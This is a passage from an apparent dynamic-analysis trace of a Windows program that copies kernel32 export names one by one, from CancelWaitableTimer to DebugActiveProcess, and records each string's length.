lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.286] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.286] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.286] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.287] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.287] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.287] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.287] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.287] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.287] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.287] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.287] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.287] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.287] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.287] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.287] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.287] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.287] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.287] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.287] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.287] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.287] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.287] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.287] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.288] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.288] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.288] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.288] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.288] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.288] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.288] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.288] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.288] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.288] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.288] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.288] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.288] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.288] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.288] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.288] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.288] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.288] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.288] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.289] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.289] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.289] lstrlenA (lpString="COPYFILEA") returned 9 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.289] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.289] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.289] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.289] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.289] lstrlenA (lpString="COPYFILEW") returned 9 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.289] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.289] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.289] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.289] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.289] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.289] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.289] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.289] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.289] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.289] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.290] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.290] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.290] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.290] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.290] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.290] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.290] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.290] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.290] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.290] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.290] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.290] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.290] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.290] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.290] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.290] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.290] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.290] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.290] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.291] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.291] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.291] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.291] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.291] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.291] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.291] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.291] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.291] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.291] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.291] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.291] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.291] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.291] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.291] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.291] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.291] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.291] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.291] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.292] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.292] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.292] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.292] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.292] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.292] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.292] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.292] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.292] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.292] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.292] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.292] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.292] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.292] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.292] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.292] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.292] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.292] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.292] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.292] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.293] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.293] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.293] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.293] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.293] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.293] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.293] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.293] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.293] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.293] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.293] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.293] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.293] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.293] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.293] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.293] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.293] lstrlenA 